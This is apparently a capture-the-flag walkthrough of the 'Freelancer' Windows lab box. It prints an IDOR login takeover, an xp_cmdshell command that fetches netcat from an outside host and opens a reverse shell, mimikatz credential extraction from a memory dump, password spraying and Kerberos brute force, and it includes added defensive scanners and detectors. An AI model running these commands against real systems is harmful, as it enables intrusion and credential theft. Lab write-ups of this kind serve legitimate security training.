Machine Card listing Freelancer as a hard Windows box

Reconnaissance

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          nginx 1.25.5
|_http-server-header: nginx/1.25.5
|_http-title: Did not follow redirect to http://freelancer.htb/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-30 23:33:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49682/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
55297/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.229.97\SQLEXPRESS:
|     Target_Name: FREELANCER
|     NetBIOS_Domain_Name: FREELANCER
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: freelancer.htb
|     DNS_Computer_Name: DC.freelancer.htb
|     DNS_Tree_Name: freelancer.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-09-30T23:32:07
|_Not valid after:  2054-09-30T23:32:07
| ms-sql-info:
|   10.129.229.97\SQLEXPRESS:
|     Instance name: SQLEXPRESS
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 55297
|     Named pipe: \\10.129.229.97\pipe\MSSQL$SQLEXPRESS\sql\query
|_    Clustered: false
|_ssl-date: 2024-09-30T23:34:53+00:00; +5h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time:
|   date: 2024-09-30T23:34:47
|_  start_date: N/A
|_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Based on the nmap scan this looks like a Domain Controller. HTTP and LDAP already expose the domain name freelancer.htb and the hostname dc.freelancer.htb; I add both to my /etc/hosts before taking a closer look.

HTTP

Webpage showing a platform to find jobs

The webpage for Freelancer is a job board. It allows searching for new jobs, registering as a freelancer or an employer, and contacting the company behind the website. Registering as a new freelancer works and I can apply to any of the jobs.

Clicking on the profile picture of an employer within the job view lets me access their profile. It also allows me to view comments from other users and post new ones. Within the URI /accounts/profile/visit/4/ I can see a numerical ID and try to change it. This lets me enumerate the users on the platform, starting at 2, the admin, and seemingly stopping at 15. My own user is not part of the list, so there might be a larger gap.

Screenshot of the Freelancer webpage with the ID 2 highlighted in the URL and the profile of the administrator visible

The employer registration form already mentions that newly created accounts will be inactive until someone reviews the account details and gets in touch via mail. The required fields are exactly the same ones seen previously when registering as a freelancer.

Form asking for account information and showing an informational message regarding manual activation

After accepting the T’s & C’s and clicking Register, I’m redirected to the login page, but trying to log in only shows an error message because the account is not activated yet. Next I’ll try to reset the password for the newly created account. With luck this is an edge case that was not anticipated, and the account may change from locked/inactive into another state.

Account recovery form asking for a username and the security questions

After submitting the account name together with the three security questions, I’m asked to set a new password and am then redirected back to the login prompt. This time the login works and I can access the dashboard, where I can manage my job postings and applicants.

Screenshot showing the dashboard after logging in

Initial Access

The most interesting feature on the dashboard is QR-Code, which generates a new QR code that can be used to log in without providing a password within the next 5 minutes.

Screenshot showing a generated QR code for the authentication

Downloading and parsing the QR code returns a link like http://freelancer.htb/accounts/login/otp/MTAwMTA=/2708b97d6275eb51adcba4aa46505887/, containing a base64 string and a hex string that changes every time. Decoding MTAwMTA= from base64 yields 10010, which looks a lot like an account ID. Using the previously found way to enumerate accounts, I check this ID and it does return my own profile page.

Screenshot of my own profile page with the ID from the QR code highlighted

In order to take over the admin account, I generate a new QR code and replace the encoded ID with the base64 encoded version of 2: Mg==. After using the modified link I’m successfully logged in as admin.

Profile Page after being logged in as admin
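To make the flaw concrete, here is an added Python model of the QR login check (constructed for this writeup, not the job board's own code): the vulnerable handler only verifies that the token segment is live and then trusts the ID segment, while the hardened one binds the token to the user it was issued for, enforces the 5-minute lifetime and makes it single-use. The path layout follows the link above; the token format (16 random bytes, hex encoded) and the class names are assumptions.

```python
import base64
import binascii
import secrets
import time
from typing import Dict, Optional, Tuple

# Link layout seen on the page: /accounts/login/otp/<base64(user id)>/<token>/
# Token format and class layout are assumptions; this is a constructed model of
# the flaw, not the site's code.
TOKEN_TTL_SECONDS = 5 * 60  # the QR code is valid for 5 minutes


def _now(now: Optional[float]) -> float:
    return time.time() if now is None else now


def encode_id(user_id: int) -> str:
    return base64.b64encode(str(user_id).encode()).decode()


def decode_id(segment: str) -> Optional[int]:
    try:
        return int(base64.b64decode(segment, validate=True).decode())
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def parse_otp_path(path: str) -> Optional[Tuple[Optional[int], str]]:
    """Split '/accounts/login/otp/<b64>/<token>/' into (user id, token)."""
    parts = path.strip("/").split("/")
    if len(parts) != 5 or parts[:3] != ["accounts", "login", "otp"]:
        return None
    return decode_id(parts[3]), parts[4]


class VulnerableOtpLogin:
    """Checks that the token is live, but trusts the id segment of the URL."""

    def __init__(self) -> None:
        self._live: Dict[str, float] = {}  # token -> expiry timestamp

    def issue(self, user_id: int, now: Optional[float] = None) -> str:
        token = secrets.token_hex(16)
        self._live[token] = _now(now) + TOKEN_TTL_SECONDS
        return f"/accounts/login/otp/{encode_id(user_id)}/{token}/"

    def login(self, path: str, now: Optional[float] = None) -> Optional[int]:
        parsed = parse_otp_path(path)
        if parsed is None:
            return None
        user_id, token = parsed
        expiry = self._live.pop(token, None)
        if expiry is None or _now(now) > expiry or user_id is None:
            return None
        # Whatever the URL claims: swapping MTAwMTA= for Mg== logs in as id 2.
        return user_id


class HardenedOtpLogin:
    """Remembers which user a token was issued for; the URL id is never trusted."""

    def __init__(self) -> None:
        self._live: Dict[str, Tuple[int, float]] = {}  # token -> (user id, expiry)

    def issue(self, user_id: int, now: Optional[float] = None) -> str:
        token = secrets.token_hex(16)
        self._live[token] = (user_id, _now(now) + TOKEN_TTL_SECONDS)
        return f"/accounts/login/otp/{encode_id(user_id)}/{token}/"

    def login(self, path: str, now: Optional[float] = None) -> Optional[int]:
        parsed = parse_otp_path(path)
        if parsed is None:
            return None
        claimed_id, token = parsed
        record = self._live.pop(token, None)  # single use: consumed even on failure
        if record is None:
            return None
        bound_id, expiry = record
        if _now(now) > expiry:
            return None
        if claimed_id != bound_id:
            return None  # tampered id segment: reject (and worth alerting on)
        return bound_id
```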

Being the administrator does not grant me additional privileges on the job board, but I can now access /admin, where I find an administrator dashboard for the page. There I can view all objects (freelancers, employers, jobs posted, …) within the database of the job board. Most interesting for me are the employers. Checking them one by one, I can find their password hashes. Neither the hash for johnHalond nor the one for tomHazard, the only two accounts with a freelancer.htb mail address, cracks with hashcat.

Screenshot showing the hash in the database visible from the webview

Execution

On the dashboard there’s also a link that opens a SQL Terminal, through which I can query the database directly. The queries are executed in the context of the user Freelancer_webapp_user.

Screenshot of the Admin dashboard with the link to the SQL Terminal highlighted. The result of the query 'SELECT username()'

Checking whether I can impersonate any other user¹ reveals that I can run queries as sa, which effectively makes me administrator of the MSSQL service.

-- List the principals recorded as grantor of a server-level IMPERSONATE permission
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

I proceed to enable xp_cmdshell to run system commands on the remote server and download a precompiled netcat binary to the machine to get a reverse shell. Executing the query gives me a shell as freelancer\sql_svc.

EXECUTE AS login = 'sa'
 
EXEC sp_configure 'show advanced options', '1'; RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE
 
EXEC master..xp_cmdshell 'mkdir C:\tools; powershell -c "iwr http://10.10.10.10/nc64.exe -useba -outfile C:\tools\nc64.exe; C:\tools\nc64.exe 10.10.10.10 9000 -e powershell.exe"'

Privilege Escalation

Shell as mikasaAckerman

Within the Downloads folder of the sql_svc user I find a configuration file that lists the password for the account as IL0v3ErenY3ager, but trying to authenticate with it errors out.

type C:\users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
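As an added defender-side example (not from the original post), the following Python scanner parses a SQL Server unattended-setup INI of this shape, including its odd `""0"` quoting, and reports which keys carry a credential and for which account, so leftover setup files like this one can be found and cleaned up before someone else reads them. The sample file and its values are constructed placeholders, not the values from the box.

```python
import re
from typing import Dict, List, NamedTuple

# Constructed sample in the shape of the sql-Configuration.INI on the page;
# the credential values are placeholders, not the ones found on the box.
SAMPLE_INI = """[OPTIONS]
ACTION="Install"
QUIET="True"
INSTANCENAME="SQLEXPRESS"
COMMFABRICNETWORKLEVEL=""0"
AGTSVCACCOUNT="NT AUTHORITY\\NETWORK SERVICE"
AGTSVCPASSWORD=""
SQLSVCACCOUNT="FREELANCER\\sql_svc"
SQLSVCPASSWORD="Sample-Service-Pass-1"
SECURITYMODE="SQL"
SAPWD="Sample-SA-Pass-2"
IAcceptSQLServerLicenseTerms=True
"""

SECRET_KEY = re.compile(r"(PASSWORD|PWD)$", re.IGNORECASE)
# Setup keys whose password belongs to the account named in a sibling key.
ACCOUNT_KEY_FOR = {
    "SQLSVCPASSWORD": "SQLSVCACCOUNT",
    "AGTSVCPASSWORD": "AGTSVCACCOUNT",
    "RSSVCPASSWORD": "RSSVCACCOUNT",
    "ISSVCPASSWORD": "ISSVCACCOUNT",
    "ASSVCPASSWORD": "ASSVCACCOUNT",
    "FTSVCPASSWORD": "FTSVCACCOUNT",
}


class Finding(NamedTuple):
    section: str
    key: str
    account: str
    masked: str


def unquote(value: str) -> str:
    # Setup writes values in double quotes and even emits ""0" for some keys,
    # so strip every leading/trailing quote rather than one matched pair.
    return value.strip().strip('"')


def parse_ini(text: str) -> Dict[str, Dict[str, str]]:
    sections: Dict[str, Dict[str, str]] = {}
    current = ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip()] = unquote(value)
    return sections


def mask(secret: str) -> str:
    return "********"  # never echo the value itself into a report


def scan_setup_ini(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for section, entries in parse_ini(text).items():
        for key, value in entries.items():
            if not SECRET_KEY.search(key) or not value:
                continue  # not a credential key, or left empty by setup
            if key.upper() == "SAPWD":
                account = "sa"  # mixed-mode install: SECURITYMODE="SQL"
            else:
                account = entries.get(ACCOUNT_KEY_FOR.get(key.upper(), ""), "?")
            findings.append(Finding(section, key, account, mask(value)))
    return findings
```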

I list the users and their descriptions to get an overview. One particular account catches my eye, because its description lists it as Database Developer. I decide to spray the password across the list of users to see if it matches anywhere nonetheless.

dsquery user -limit 0 | dsget user -samid -desc
  desc                                                                  samid              
  Built-in account for administering the computer/domain                Administrator      
  Built-in account for guest access to the computer/domain              Guest              
  Key Distribution Center Service Account                               krbtgt             
  Database Developer                                                    mikasaAckerman     
                                                                        sshd               
  SQL Backup Operator Account for Temp Schudeled SQL Express Backups    SQLBackupOperator  
  MSSQL Database Domain Account                                         sql_svc            
  IT Support Technician                                                 lorra199           
  System Analyzer                                                       maya.artmes        
  Department Manager                                                    michael.williams   
  IT Support                                                            sdavis             
  Software Developer                                                    d.jones            
  Software Developer                                                    jen.brown          
  Human Resources Specialist                                            taylor             
  Executive Manager                                                     jmartinez          
  WSGI Manager                                                          olivia.garcia      
  System Analyzer                                                       dthomas            
  Datacenter Manager                                                    sophia.h           
  DJango Developer                                                      Ethan.l            
  Active Directory Trusts Manager                                       wwalker            
  Active Directory Accounts Operator                                    jgreen             
  Active Directory Accounts Operator                                    evelyn.adams       
                                                                        hking              
  DJango Developer                                                      alex.hill          
                                                                        samuel.turner      
  Site Reliability Engineer (SRE)                                       ereed              
  Site Reliability Engineer (SRE)                                       leon.sk            
  IT Technician                                                         carol.poland       
  System Reliability Monitor (SRM) & Account Operator                   lkazanof

As hoped, the password works for the account mikasaAckerman, and I can pivot to it.

nxc smb freelancer.htb -d 'freelancer' -u users.txt -p 'IL0v3ErenY3ager' --continue-on-success
SMB         10.129.229.97   445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:freelancer.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.97   445    DC               [-] freelancer\Administrator:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\Guest:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\krbtgt:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [+] freelancer\mikasaAckerman:IL0v3ErenY3ager 
SMB         10.129.229.97   445    DC               [-] freelancer\sshd:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\SQLBackupOperator:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\sql_svc:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\lorra199:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\maya.artmes:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\michael.williams:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\sdavis:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\d.jones:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\jen.brown:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\taylor:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\jmartinez:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\olivia.garcia:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\dthomas:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\sophia.h:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\Ethan.l:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\wwalker:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\jgreen:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\evelyn.adams:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\hking:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\alex.hill:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\samuel.turner:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\ereed:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\leon.sk:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\carol.poland:IL0v3ErenY3ager STATUS_LOGON_FAILURE 
SMB         10.129.229.97   445    DC               [-] freelancer\lkazanof:IL0v3ErenY3ager STATUS_LOGON_FAILURE

To change my current user, I upload RunasCs.exe to the machine and execute it with the credentials for mikasaAckerman. Using the -r switch and providing an IP and port gives me a reverse shell, which allows me to read the first flag.

C:\tools\RunasCs.exe mikasaAckerman 'IL0v3ErenY3ager' powershell.exe -r 10.10.10.10:9001
 
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-4b139$\Default
[+] Async process 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 3812 created in background.

Shell as lorra199

On the desktop there’s a text file called mail.txt and a rather large file MEMORY.7z. Reading the mail explains that the archive is a memory dump of DATACENTER-2019.

mail.txt
Hello Mikasa,
I tried once again to work with Liza Kazanoff after seeking her help to troubleshoot the BSOD issue on the "DATACENTER-2019" computer. As you know, the problem started occurring after we installed the new update of SQL Server 2019.
I attempted the solutions you provided in your last email, but unfortunately, there was no improvement. Whenever we try to establish a remote SQL connection to the installed instance, the server's CPU starts overheating, and the RAM usage keeps increasing until the BSOD appears, forcing the server to restart.
Nevertheless, Liza has requested me to generate a full memory dump on the Datacenter and send it to you for further assistance in troubleshooting the issue.
Best regards,

For further inspection I transfer the memory dump to my machine. To do so, I serve an SMB share from my host and mount it on the target. The security settings require authentication, so I set credentials when starting the SMB server.

# On my local machine
mkdir smb && cd smb
 
impacket-smbserver -username test -password test -smb2support share $(pwd)
 
# On the remote machine
net use n: \\10.10.10.10\share /user:test test
 
cp MEMORY.7z n:

Since my go-to tool for memory analysis, volatility3, errors out (not anymore…) and volatility 2.6 also does not produce any meaningful output, I switch to my Windows VM and use WinDbg in combination with mimikatz to check for credentials and hashes².

I load the memory image into WinDbg with Open dump file and the tool starts to download the necessary symbol files. Then I load the mimikatz DLL mimilib into the debugger, search for the lsass process and switch to its context.

1: kd> .load C:\Users\ryuki\Documents\tools\mimikatz\x64\mimilib.dll
 
  .#####.   mimikatz 2.2.0 (x64) built on Sep 19 2022 17:44:00
 .## ^ ##.  "A La Vie, A L'Amour" - Windows build 17763
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */
 
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
 
1: kd> !process 0 0 lsass.exe
PROCESS ffffbc83a93e7080
    SessionId: 0  Cid: 0248    Peb: c4fb6df000  ParentCid: 01c8
    DirBase: 0cfd2002  ObjectTable: ffffd3067d89ab00  HandleCount: 1051.
    Image: lsass.exe
 
1: kd> .process /r /p ffffbc83a93e7080
Implicit process is now ffffbc83`a93e7080
Loading User Symbols
................................................................
...................
 
************* Symbol Loading Error Summary **************
Module name            Error
myfault                The system cannot find the file specified
 
You can troubleshoot most symbol related issues by turning on symbol loading diagnostics (!sym noisy) and repeating the command that caused symbols to be loaded.
You should also verify that your symbol search path (.sympath) is correct.
 
1: kd> !mimikatz
 

The !mimikatz command takes a while but eventually produces a long list of hashes and keys, and also the cleartext password v3ryS0l!dP@sswd#29.
Testing for credential reuse on the known accounts comes up empty, but whenever I see digits at the end of a password, I think about incrementing or decrementing the number. I create a list with the numbers from 1 to 100, combine each of them with the password, and then use those combinations in a password spraying attack.

# Create password file
for i in {1..100}; do echo 'v3ryS0l!dP@sswd#'$i; done > passwords.txt
 
# Create combinations
for p in $(cat passwords.txt); do for u in $(cat users.txt); do echo "$u:$p"; done; done > combinations.txt
 
# Synchronize time
sudo timedatectl set-ntp false
sudo ntpdate -u dc.freelancer.htb
 
# Run kerbrute
./kerbrute bruteforce --domain freelancer.htb --dc dc.freelancer.htb combinations.txt
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: v1.0.3 (9dad6e1) - 10/03/24 - Ronnie Flathers @ropnop
 
2024/10/03 18:30:30 >  Using KDC(s):
2024/10/03 18:30:30 >   dc.freelancer.htb:88
 
2024/10/03 18:30:36 >  [+] VALID LOGIN:  michael.williams@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:36 >  [+] VALID LOGIN:  sql_svc@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:36 >  [+] VALID LOGIN:  leon.sk@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:36 >  [+] VALID LOGIN:  carol.poland@freelancer.htb:v3ryS0l!dP@sswd#34
2024/10/03 18:30:37 >  [+] VALID LOGIN:  sdavis@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  d.jones@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  olivia.garcia@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  dthomas@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  taylor@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  jmartinez@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  jen.brown@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  Ethan.l@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  wwalker@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  sophia.h@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  jgreen@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  evelyn.adams@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  alex.hill@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  samuel.turner@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  hking@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:37 >  [+] VALID LOGIN:  ereed@freelancer.htb:v3ryS0l!dP@sswd#35
2024/10/03 18:30:57 >  Done! Tested 2900 logins (20 successes) in 27.704 seconds

The password spray comes back with 20 valid combinations for a variety of accounts. Among them are several members of the Remote Management Users group, which allows me to use WinRM for an interactive session, a few Account Operators that I can use to reset the password of accounts that do not belong to highly privileged groups3, and some others.
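
As an added example (not part of the original writeup), this is the detection a defender would run over the Domain Controller's Security log for the spray shown above. kerbrute speaks Kerberos directly, so the attempts never appear as 4625 logon failures on a member server; each wrong guess is a 4771 (pre-authentication failed, failure code 0x18) and each hit a 4768 (TGT issued) on the DC. The sample events are constructed, and the 10.10.14.5 (sprayer) and 10.129.229.50 (legitimate user) addresses are assumptions.

```python
"""Spot a Kerberos password spray in Domain Controller security events.

A spray from one client address fails pre-authentication (4771, code 0x18)
against many distinct accounts in a short window, then obtains TGTs (4768,
code 0x0) for the accounts whose password it guessed. Sample data below is
constructed, not a real log export.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample, one record per line:
# time | event id | TargetUserName | client IpAddress | failure/result code
SAMPLE_EVENTS = """\
2024-10-03 18:25:10|4771|lorra199|10.129.229.50|0x18
2024-10-03 18:25:14|4771|lorra199|10.129.229.50|0x18
2024-10-03 18:25:20|4768|lorra199|10.129.229.50|0x0
2024-10-03 18:30:30|4771|michael.williams|10.10.14.5|0x18
2024-10-03 18:30:30|4771|sql_svc|10.10.14.5|0x18
2024-10-03 18:30:31|4771|leon.sk|10.10.14.5|0x18
2024-10-03 18:30:31|4771|carol.poland|10.10.14.5|0x18
2024-10-03 18:30:32|4771|sdavis|10.10.14.5|0x18
2024-10-03 18:30:32|4771|lorra199|10.10.14.5|0x18
2024-10-03 18:30:33|4771|evelyn.adams|10.10.14.5|0x18
2024-10-03 18:30:36|4768|michael.williams|10.10.14.5|0x0
2024-10-03 18:30:37|4768|evelyn.adams|10.10.14.5|0x0
"""

PREAUTH_FAILED = 4771
TGT_REQUESTED = 4768
BAD_PASSWORD = "0x18"  # KDC_ERR_PREAUTH_FAILED: wrong password for an existing account


def parse_events(text):
    """Turn the pipe-separated sample into a list of event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, user, ip, code = line.split("|")
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "event_id": int(eid),
            "user": user.lower(),
            "ip": ip,
            "code": code,
        })
    return events


def detect_spray(events, window=timedelta(seconds=60), min_accounts=5):
    """One alert per client address that fails pre-auth for at least
    `min_accounts` distinct accounts inside any `window`, listing the accounts
    that afterwards obtained a TGT from the same address (the spray hits)."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        failures = [e for e in evs
                    if e["event_id"] == PREAUTH_FAILED and e["code"] == BAD_PASSWORD]
        for i, start in enumerate(failures):
            end = start["time"] + window
            users = {e["user"] for e in failures[i:] if e["time"] <= end}
            if len(users) < min_accounts:
                continue
            hits = {e["user"] for e in evs
                    if e["event_id"] == TGT_REQUESTED and e["code"] == "0x0"
                    and start["time"] <= e["time"] <= end}
            alerts.append({
                "ip": ip,
                "first_failure": start["time"],
                "distinct_accounts": len(users),
                "accounts": sorted(users),
                "successful_logons": sorted(hits),
            })
            break  # one alert per source address is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(f"[!] spray from {alert['ip']} starting {alert['first_failure']}: "
              f"{alert['distinct_accounts']} accounts, hits: {alert['successful_logons']}")
```

The single user who mistypes a password twice from 10.129.229.50 stays below the threshold, while the sprayer trips it within three seconds and the two successful TGT requests that follow tell the responder which accounts to reset first.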

Note

Getting such a high number of accounts was unexpected and probably not fully intended. I assume the intended way was to find the password for lorra199 in the memory dump through memprocfs, but instead I decided to reset the password for this account through one of the account operators.

bloodyAD -d freelancer -u evelyn.adams -p 'v3ryS0l!dP@sswd#35' --host freelancer.htb set password lorra199 'Helloworld123!'

Shell as liza.kazanof

After using WinRM to get an interactive shell on the Domain Controller as lorra199, thanks to the membership in the Remote Management Users group, I notice an unusual group membership: AD Recycle Bin. When an object is deleted in Active Directory it is not necessarily gone for good but is placed into the Recycle Bin (if that feature is enabled)4.

So I decide to have a peek and check whether there are any deleted accounts in the bin, and there is just one deleted object: liza.kazanof. This account was also present in the memory dump together with its hash and apparently belongs to the Backup Operators group. If I can restore this account and the hash is still valid, I can use it to take over the domain.

Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
 
 
accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : freelancer.htb/Deleted Objects/Liza Kazanof
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
CN                              : Liza Kazanof
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
codePage                        : 0
countryCode                     : 0
Created                         : 5/14/2024 6:37:29 PM
createTimeStamp                 : 5/14/2024 6:37:29 PM
Deleted                         : True
Description                     :
